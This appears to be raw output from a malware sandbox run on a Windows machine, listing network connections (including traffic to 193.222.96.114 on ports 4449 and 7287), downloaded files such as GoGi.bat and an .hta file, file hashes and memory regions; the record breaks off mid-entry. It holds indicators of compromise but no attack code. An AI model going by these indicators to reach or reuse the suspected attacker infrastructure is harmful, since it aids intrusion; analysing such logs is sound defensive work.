US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 73.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.200.14:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.200.14:443 redirector.gvt1.com udp
US 8.8.8.8:53 r1---sn-25glene6.gvt1.com udp
FR 173.194.190.134:443 r1---sn-25glene6.gvt1.com tcp
US 8.8.8.8:53 r1.sn-25glene6.gvt1.com udp
US 8.8.8.8:53 r1.sn-25glene6.gvt1.com udp
FR 173.194.190.134:443 r1.sn-25glene6.gvt1.com udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 134.190.194.173.in-addr.arpa udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 53.121.117.34.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 88.16.208.104.in-addr.arpa udp
NL 193.222.96.114:4449 tcp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 virustotal.com udp
US 216.239.32.21:80 virustotal.com tcp
US 216.239.32.21:80 virustotal.com tcp
US 8.8.8.8:53 virustotal.com udp
US 8.8.8.8:53 virustotal.com udp
US 216.239.32.21:443 virustotal.com tcp
US 8.8.8.8:53 www.virustotal.com udp
US 74.125.34.46:443 www.virustotal.com tcp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
US 8.8.8.8:53 21.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
US 8.8.8.8:53 www.recaptcha.net udp
GB 142.250.187.195:443 www.recaptcha.net tcp
US 8.8.8.8:53 www.recaptcha.net udp
US 8.8.8.8:53 www.recaptcha.net udp
GB 142.250.187.195:443 www.recaptcha.net udp
US 8.8.8.8:53 recaptcha.net udp
US 8.8.8.8:53 46.34.125.74.in-addr.arpa udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 104.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
GB 142.250.200.35:443 recaptcha.net tcp
US 8.8.8.8:53 recaptcha.net udp
US 8.8.8.8:53 recaptcha.net udp
GB 142.250.200.35:443 recaptcha.net udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
NL 193.222.96.114:7287 tcp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
GB 142.250.187.195:443 www.recaptcha.net udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp

Files

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\activity-stream.discovery_stream.json.tmp

MD5 9bcec1ed9a44ca5effa617f4f93b6211
SHA1 50ec5452b429da160a89536def5958931877c8af
SHA256 b6e7a899aef9d74899d8a405b3ab9630582a838aebb7b191fb93621390f6da46
SHA512 04ccf8c06d54e64eb92ae2d304f48733b75c4160a609adf17fccc86fd838b06bcb00151ad8f701a326b1cf1ad881ecc168f97a7e8bfe0715bcfc20be9e8cbde7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 dad152db4cb073feac3b68b9a1f5e22e
SHA1 2193da5d47177e047c6a6c467d03dc80b59c4f45
SHA256 337e556065c4dc8196ce82ed9cdb0ec6ef4911612af689fddef17479ae0f744e
SHA512 0c6cc79e12eb085b1b03fa7f66357e88b724a4317ed115cb7329bb64707336f35961077e72215c2d0bab96e91db92bc8e737a69bff73299e99a49ca02a993418

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\prefs-1.js

MD5 7aee3c610a901c46848f3a8203c27656
SHA1 af7232a81c4accf1891a4c37a38db1ad052fbd5f
SHA256 80e149d1b8e7aef48dad4a3e552f72468f77863425f2ddcb5cef1170da810500
SHA512 07f61e6daf75ce3f0ec96edb24e88f61062549de7db3546168693e9e411f8aedcf8149b6afdad412d5968f2bd7832007c0725a417f376eaa19cb2e4b6c2a33eb

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\entries\C72D4296C2EBC6FD41A9F780CD0C8F30F0FF937C

MD5 813bf372751fffbdeedb292202e55b97
SHA1 09bd91cad26cd66eea569d8e0e62ef7167b944d4
SHA256 08ec27d2587c678ef9f71319e7a0d9c986b9857ee7cb762ee7b67705584a6904
SHA512 928ba4ec4d99aa8ded86d01e898b87faa2c568ddb1e3c00486ee17049b76709f14c0ab7cd4160055cdeb14d15a366896911f8fb502c052e80e093ec5b789ddc5

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\prefs-1.js

MD5 02ba2f2d28f92324946c4b846f0ef278
SHA1 518f5353e722b6027b3376015b948d516d862d2d
SHA256 257964daed6b2ca482ef22ed272d4f59e68974cec349a11686ea9af8ca730fd1
SHA512 766ad89f48d7ace44193435d7063264efaecd181bdc21560ce329b10ef904f2c76ea57c5b18f14de81a697b9bfa7552b372707b10a9e8d27c60841af36d1bca9

C:\Users\Admin\Downloads\OzUUjFK9.xlsx.part

MD5 dfa28ceef932c1605d40981a5023dab0
SHA1 a6e8c5cdd144cb27685198fecad8f9def48dfbe8
SHA256 9e0bac9938b4059f69ed52af74337c38c242213ecd432746a483d44e1e74dff6
SHA512 28bc8a4c30e566a60280b194f5442c160f0b9c8b3dd10fa8d321035e7a3b76271373274b0d25bb8f04ac213f4293f3bde7ee8c6ff7d77caa2a4ba5276e0ccc80

memory/3624-1071-0x00007FF84CEF0000-0x00007FF84CF00000-memory.dmp

memory/3624-1073-0x00007FF84CEF0000-0x00007FF84CF00000-memory.dmp

memory/3624-1072-0x00007FF84CEF0000-0x00007FF84CF00000-memory.dmp

memory/3624-1074-0x00007FF84CEF0000-0x00007FF84CF00000-memory.dmp

memory/3624-1076-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/3624-1080-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/3624-1081-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/3624-1082-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/3624-1083-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/3624-1084-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/3624-1086-0x00007FF84AE90000-0x00007FF84AEA0000-memory.dmp

memory/3624-1087-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/3624-1085-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/3624-1096-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/3624-1098-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/3624-1100-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/3624-1102-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/3624-1109-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/3624-1097-0x00007FF84AE90000-0x00007FF84AEA0000-memory.dmp

memory/3624-1118-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/3624-1119-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/3624-1121-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/3624-1123-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/3624-1075-0x00007FF84CEF0000-0x00007FF84CF00000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 2b770ddd2b8e1a14fae17e67cb88de03
SHA1 c73572dbb8c2429762f1fed5196cd19fb3421e0a
SHA256 6a38c9dbce571be02310a9864251fb43964fd96a42e7f4d3d54d4596b8212df1
SHA512 d08b5fec58ba3a760c66cc4b49c91c22d8d9040f995808f2b097d27659aae3f5c38d7d661ae0480ae25b7c9e195b1e06f1d70595b65056df9e6c1226fa8219e1

C:\Users\Admin\Downloads\GoGi.EIAmXjDS.bat.part

MD5 3a8565cccde35c1e9b7ffafc96056857
SHA1 50fd67344b6c9c39977c293417dec8ffa34b2507
SHA256 622ec2867f5df3c0022e56e95fb8c34af9e64db758261bc193c8741e48eb883f
SHA512 45c7709148d5c890c4adf413d5cee8d55d4ecfeb26b0cc7c8e0f7752444b292b2efb93862fc6f78c47271b4b652795640412d20a2fa5a46fcc9b51b832bd3294

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 4fcb2a3ee025e4a10d21e1b154873fe2
SHA1 57658e2fa594b7d0b99d02e041d0f3418e58856b
SHA256 90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228
SHA512 4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 3fb5cea8e6b2f23390fab986bc8079ba
SHA1 a89d8670d09fa49020c511ebfd0f1d3cf89155be
SHA256 25a1f9bfc6af7ba171e090d79450fce869311ae959bbbe13c9ad2086ef227ceb
SHA512 2bbc94afd6f7b5b414e1cd3750ca4e4543f0a0294a7ff84f1b37f4d4ae9b0eec88cc7d640a57f3132f529a4f1db66a39eb26c52564499278102262ce233b07ba

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 451a6240a3ff1f3928ab6e8f3bc159db
SHA1 f9dab6b72d854aabc5c884060e27a3362a154d1a
SHA256 113dccc01bc07ae07cfaf59c88a8aa3ab0f6c92c024e4a1e589121c485f1d167
SHA512 3c0d7e8a902a3ae863e877840bd61d11b7cb902d9dc0408edb76c61bd6b8c63fb4bdeaa7d544ccf08baf3ef099d9dddae7b529f64c8f410ff5f75bbbc1efca54

C:\Users\Admin\Downloads\GoGi.bat

MD5 cab2108a81d68104dd9b15efcedf8351
SHA1 03852c18f75cad87f71693fb1973d9a04e8910ed
SHA256 a2dfe970dc385f9aa1a81946c4bc41144d182dbddb02e37ce4c5b52c9b884aaa
SHA512 e474ce03766f8e21fdb14e072144e8e1c5fa1f30e66ea4f7a05fade86bd783fb4dec65d23ab01861524959a0a029cb2112074116fdbd72d02ab4794216ed95f5

memory/5160-2152-0x0000024789A80000-0x0000024789AA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ovq0zecw.q5m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5160-2163-0x00007FF85B6F0000-0x00007FF85C1B1000-memory.dmp

memory/5160-2164-0x00000247899B0000-0x00000247899C0000-memory.dmp

memory/5160-2165-0x00000247899B0000-0x00000247899C0000-memory.dmp

memory/5160-2166-0x00000247A2460000-0x00000247A24A4000-memory.dmp

memory/5160-2167-0x00000247A2530000-0x00000247A25A6000-memory.dmp

memory/5344-2177-0x00007FF85B6F0000-0x00007FF85C1B1000-memory.dmp

memory/5344-2178-0x00000218C0E90000-0x00000218C0EA0000-memory.dmp

memory/5344-2179-0x00000218C0E90000-0x00000218C0EA0000-memory.dmp

memory/5344-2182-0x00007FF85B6F0000-0x00007FF85C1B1000-memory.dmp

memory/5160-2183-0x00000247A2430000-0x00000247A2438000-memory.dmp

memory/5160-2184-0x00000247A2440000-0x00000247A2450000-memory.dmp

memory/5160-2185-0x00000247A24B0000-0x00000247A24C8000-memory.dmp

memory/3624-2187-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/5160-2188-0x00000247899B0000-0x00000247899C0000-memory.dmp

memory/3624-2189-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/5160-2190-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

memory/5160-2193-0x00007FF87CA80000-0x00007FF87CA99000-memory.dmp

memory/5160-2194-0x00000247899B0000-0x00000247899C0000-memory.dmp

C:\Users\Admin\Downloads\index.GPBUM8KI.hta.part

MD5 3f94f80e352544637c32101734c80033
SHA1 16116f8e2f096c699046117e0acfe88e93d13729
SHA256 4bbaaa32c5f71d04eb61c6c02c3a4fc04ad6c417e09a8a73b30435947c2df619
SHA512 4540e277fe696bb168e04a256cce82d98e921c8c7a977a6a15acaa6ce5f2a263a19c3f4048012ae07f8ace65acfa60710e8641c7e299211d32a1089558ab1988

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\prefs-1.js

MD5 b7d1e3b8bc43fc023e92ff4a4c746193
SHA1 43aad76f2e1f0ba23b902a2be794f22e5f7201b3
SHA256 dcb0f12460dbcab69be0fa5101b7453079f7bee60c828114587e1364cd7a1597
SHA512 4e348c0164b3f9f49430896cdb5b142fa3452ce562738da61d1679513807de9051ac465e775cffad7ee36fc58795ff9452fadf5c51d7b4fbc72cb960d6f04c17

memory/5160-2237-0x00007FF85B6F0000-0x00007FF85C1B1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 a817c54d2f71e208a6a094f7afcaf276
SHA1 59692aa2d217adfdc60dfe8a0196ab2d35caa3e3
SHA256 cac944a1faa7cf8d6de8a310acaa9756cc24c05247e834d417e1a5aa5519baa6
SHA512 2c0415d49d97fccb25ca133b5c2f3a30844700843efe5940b961e3924aa7ddef9c97ed6d5f8a80adf63d4e96f7361d5257dd36051009621a2bd70b21ed84ba52

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\154\{ed5299f1-b6ba-4d3a-a926-9a8b8a66c79a}.final

MD5 c366a3613bd3d6329d43d12117ed4059
SHA1 d3e8e59672d2ce345769afd88a71fbb90d70943d
SHA256 582807864cf6905f2404f2bb7e84789d15afbb0bd5c9566e04cf7b8cb6c29a7b
SHA512 7087bec44839f155caa8a57a65d4fcc117796edb80a991a9bcea620be9d0a497841148f36f09fa4995ef4dd7bd65c566760ff9f32c48a154fb3cacf1737a127a

memory/5160-2317-0x00000247899B0000-0x00000247899C0000-memory.dmp

memory/5160-2318-0x00000247899B0000-0x00000247899C0000-memory.dmp

memory/5160-2345-0x00000247899B0000-0x00000247899C0000-memory.dmp

memory/5160-2365-0x00007FF88CE70000-0x00007FF88D065000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\entries\CD429C0BD381706883301C98CDE6E7D5C78016A3

MD5 55138ac2670326e53d4af333f6f89511
SHA1 859870da3d61ecdf38d7f7e7f7abe07ef0eb0a0b
SHA256 b63861401978aa2383dfad43f465051616b585c6bdc383b216695ffdeba30ffe
SHA512 ecfc73ae718da43008262f01d39d007b4b883a7ce75ae16f9f875a4fdae835c0d8f6b43011476f3f6c4dda625eb18822ba31a0c3d810c9fa539f36928a9e613b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 8ad9a92da348b1b5389f9872b98fc99c
SHA1 0e0fc3fdca396442adc4bee38c6eee1a4d4395f4
SHA256 2b4f593b8ffd1864dd0248f0229143910b062d7a2d73f9b659c4d215cae612c5
SHA512 528885274db607680450522a0904abf2908778acee5d6e4b961d9d0bd2653ff53851a7880c005b58a106f74a729b277b8049d75f634a086b9fbe7325ce7e3279

memory/5160-2397-0x00000247899B0000-0x00000247899C0000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\1117

MD5 524b192d33a3fe5467e397e013582670
SHA1 34df10b42d66a95831a81117220578b37e451f2a
SHA256 14893b9fbf773830bcc1e050bd231075e3107d4fbd7bbc57b66d2df0be12a0b4
SHA512 16268cfec5673dd94e0a5f3c8288f00cbd6696e98c2fcc927ea46cb20924698197f492653f23c2e424d675b3d43dfeb5dfcce4cab409c2c249d5fa95d8684419

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\26793

MD5 67e28aa226c591629f6835445910be8f
SHA1 c997231fac59ac9603ef23de75d4ded65ba96884
SHA256 22de2149f7c852dcee7bfe90510df9338a251fbc51dd3cfe93a104cf7ba86741
SHA512 8e4c446f8ebcaf29601ddc6ab0dd09538cf78795529e50e3d72b28b7997a5f8c4352b910008bb6f4d9e50573a83910e4ed75d8d39613f1d7573b5c787d88de84

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\entries\5FD0A429C10B4A7BE6660E2A585C4CC16139F357

MD5 b868abe4905c3cc58ec51ea51897e978
SHA1 879f3d785ca7ab63eb3adb292061ea0a08cc13dc
SHA256 8b8bbac0e04c0c7548c9f7f06c0d6ae9ea5b9f14e3184413a43cf1cedd3affb9
SHA512 417d076b941e069c09786b9beb25e777a5bc835ae4f07f3137e28c5bc208d4e1e332003ecc48ba903f8dcc8d83d440ac359618a8880f1b2a25f16cdfe79d1705

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\28583

MD5 11c8ded3b76c84210ffd62510003b2a4
SHA1 a9490452c18a20b90245b2cef5e9708bf0374241
SHA256 6d1b38573974b2d1eeea3cd5df048dd1b1f516187e01a2e5470ff08e270ba6fd
SHA512 f8311d52fc57ecf47f0ea3b6919f173b196fc11bcfe9f2d7d91bcf1d148a1d7512310ea35c6978d209037ef2fff996d7fd5feef02baef0e96e1533b7acd88373

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\1337

MD5 af5e87c6d08f2113610e4c7b5225b078
SHA1 edd4f6148c16ed644e83eb2473e67cce23434ec4
SHA256 3e943b681492271ae11345c6a7bab68152f60be00df45446d074c67d3fde4531
SHA512 20ed0878b8f7df5dc8049d640e958da0fa681a912a10bb70a56f6a6d24a9cc370c5da1ddcc0dc7163274983b4d95ccbe408a6e51babb2bd9121b46b8dd53bec0

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\entries\CDEF1D88929A4E5F3AE6D1E3DA63A8C22367DA61

MD5 435bf67a2791b265cda17a6e42869d7b
SHA1 254010694acec8710fa2c97bc281c788418c9967
SHA256 1ef0466e6d4aefeca76cc9a8b23d9a9d64cc2bd3d94f433c793aea477a52450c
SHA512 ef8d3c76755ac9925ac0fa7e8b72bbc71a2a4914525c1b4e9fb795882c6359c655b5697bbab0da9304233dbb3080852b51b8e1f06e815f603b0ca2d0b3271a66

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\entries\2DEB3B81EB96245D9BC1CF71DE19C61850835DAB

MD5 edb2d5544a6424b8e8885a0c00954c20
SHA1 d9899ca6a195ab6f35884bb781fdd1a5430ecdd3
SHA256 0fddec108db27c9ce820d764a00a8894f92c6279633d477abf1a04f4198efbf7
SHA512 321700692dfd9e96478d4e9981495290f0ae7e0f2cda77cc74ca4ec99feb84ea20c9c3bdb032ba4215df1a10b84708c6ceffc146916d29e5036d50d0350c9b27

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\entries\B949F770F5968E847A5DEB73F086065F9E7D1AC2

MD5 66755b0e0d5525953c6c6dbc4ccebaab
SHA1 c4b1a36113436ef9a98feb490da7fb623e714550
SHA256 f1cf3acd06293b02f6e80f9b52e5bc03e546f0e0fe32097841e1f73966948aa0
SHA512 ba052f185080543f3f99383bfe8f32a5d011b3c63f23edfed36334b4ba421e3bd7ad6431c6efc0445b9251e8412eaa9f7ebe7baed0939c9fb0a85477559694b9

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 3cba3dbea3a833bc033fbc5e20db699b
SHA1 cb21679bd09dbcadd5afe438ccf1f85a9faa90b8
SHA256 fc4e8539da2d2559488b0a5a063d4ce71221ed06ebfe8fbc3700532397ef6626
SHA512 d005e04a9b663623f5e99aa9112ab7739bf3bc3adc696372d93c19c449aa11f6bb92bc92a93b8a7750d37566b5fd7a99e6dcc3599459f31fcaf8007769bf1410

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\entries\C8E2BA665BCA179A1F1F0C290BF49020A432BBF0

MD5 b3a06031ebfebc76ce6efeb84362f689
SHA1 53dd8c365c98694a170d8d513f54ef543e992aa9
SHA256 696e55cb0d1423f81c1888d3c52abd7085237c360976f500bf7fffafcde69bbc
SHA512 0adfb0995846aafeff27376ce3ce695dc432ef43c7982fad0ebe774c36c981e2ea2c05f4434cffe92b740451377f1cc9190085930a8fc1b5198a18b177107abf

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 9dbfeaeae5e6a6968355aebd979269b5
SHA1 7c45f9fac81ceae08222935850ac1969fcec1b3a
SHA256 21121c971445783aa3afed02ec0e7ff13e6f88bdd49bb9159a19497b9d68ee0d
SHA512 ba26f91bf3e2dba1944e43b804bb7d8c1a52dda70560ace28bfc3651ba0c9e63cccc0deb03c000d63a9116ca7acd5d7c4624132feb13533ba813494b943b6712

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 4aee109d1472e0a30a0676f9b0d60f4c
SHA1 c03bf4e5884fa81d4c630f24c71ad3e4fd4c13be
